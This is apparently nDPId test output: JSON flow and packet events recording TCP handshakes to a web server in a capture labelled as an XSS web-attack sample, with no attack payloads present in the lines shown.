-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":3,"flow_last_seen":1499347570572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347570572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0JAAD4GLpasEAABwKgKMuTsAFD4v6PvOpw8noAQAOXF0gAAAQEICgE7NK8D5QYk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347573065,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347573065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8STJAAD4GfJ6sEAABwKgKMuUGAFCilH4sAAAAAKACchAgkwAAAgQFtAQCCAoBOzceAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":2,"flow_last_seen":1499347573065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Qbzm\/YPopR+LaAScSArTgAAAgQFtAQCCAoD5QiTATs3HgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":3,"flow_last_seen":1499347573066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347573066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0STNAAD4GfKWsEAABwKgKMuUGAFCilH4t85v2EIAQAOXKVQAAAQEICgE7Nx4D5QiT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347574366,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347574366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8umZAAD4GC2qsEAABwKgKMuUaAFCmeIIFAAAAAKACchAXfQAAAgQFtAQCCAoBOzhjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":2,"flow_last_seen":1499347574366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5RoJ5n+MpniCBqAScSCBKwAAAgQFtAQCCAoD5QnZATs4YwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":3,"flow_last_seen":1499347574367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347574367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0umdAAD4GC3GsEAABwKgKMuUaAFCmeIIGCeZ\/jYAQAOUgMgAAAQEICgE7OGQD5QnZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347575652,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347575652,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XdZAAD4GZ\/qsEAABwKgKMuUoAFDuGWRzAAAAAKACchDsHQAAAgQFtAQCCAoBOzmlAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":1499347575652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Sh6374H7hlkdKAScSClFgAAAgQFtAQCCAoD5QsaATs5pQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":1499347575653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347575653,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XddAAD4GaAGsEAABwKgKMuUoAFDuGWR0et++CIAQAOVEHgAAAQEICgE7OaUD5Qsa"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347578164,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347578164,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86A1AAD4G3cKsEAABwKgKMuVCAFCbVdQUAAAAAKACchDMsgAAAgQFtAQCCAoBOzwZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5093,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":1499347578164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5UJIGXyrm1XUFaAScSD3WQAAAgQFtAQCCAoD5Q2OATs8GQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":3,"flow_last_seen":1499347578165,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347578165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06A5AAD4G3cmsEAABwKgKMuVCAFCbVdQVSBl8rIAQAOWWYQAAAQEICgE7PBkD5Q2O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347579405,"flow_last_seen":1499347579405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347579405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1499347579405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mitAAD4GK6WsEAABwKgKMuVQAFAuJKdkAAAAAKACchBlUAAAAgQFtAQCCAoBOz1PAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":1499347579406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579406,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5VD8Ip+YLiSnZaAScSC3ygAAAgQFtAQCCAoD5Q7EATs9TwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":1499347579406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347579406,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mixAAD4GK6ysEAABwKgKMuVQAFAuJKdl\/CKfmYAQAOVW0gAAAQEICgE7PU8D5Q7E"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347580693,"flow_last_seen":1499347580693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347580693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1499347580693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ma5AAD4GlCKsEAABwKgKMuVeAFCEtA8\/AAAAAKACchCllQAAAgQFtAQCCAoBOz6RAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":1499347580694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5V5F9x9ShLQPQKAScSAtQAAAAgQFtAQCCAoD5RAGATs+kQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":1499347580694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347580694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ma9AAD4GlCmsEAABwKgKMuVeAFCEtA9ARfcfU4AQAOXMRwAAAQEICgE7PpED5RAG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347583209,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347583209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hK5AAD4GQSKsEAABwKgKMuV4AFAxSsWoAAAAAKACchBABwAAAgQFtAQCCAoBO0EGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":1499347583209,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5XgjIturMUrFqaAScSAruAAAAgQFtAQCCAoD5RJ7ATtBBgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":3,"flow_last_seen":1499347583211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347583211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK9AAD4GQSmsEAABwKgKMuV4AFAxSsWpIyLbrIAQAOXKvgAAAQEICgE7QQcD5RJ7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347584472,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347584472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XXVAAD4GaFusEAABwKgKMuWGAFAsKR83AAAAAKACchDqTwAAAgQFtAQCCAoBO0JCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":1499347584472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5YYTf0ohLCkfOKAScSB18gAAAgQFtAQCCAoD5RO3ATtCQgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":3,"flow_last_seen":1499347584473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347584473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XXZAAD4GaGKsEAABwKgKMuWGAFAsKR84E39KIoAQAOUU+gAAAQEICgE7QkID5RO3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347585744,"flow_last_seen":1499347585744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347585744,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1499347585744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585744,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CJdAAD4GvTmsEAABwKgKMuWUAFD9vEsXAAAAAKACchDrjwAAAgQFtAQCCAoBO0OAAAAAAAEDAwc="} 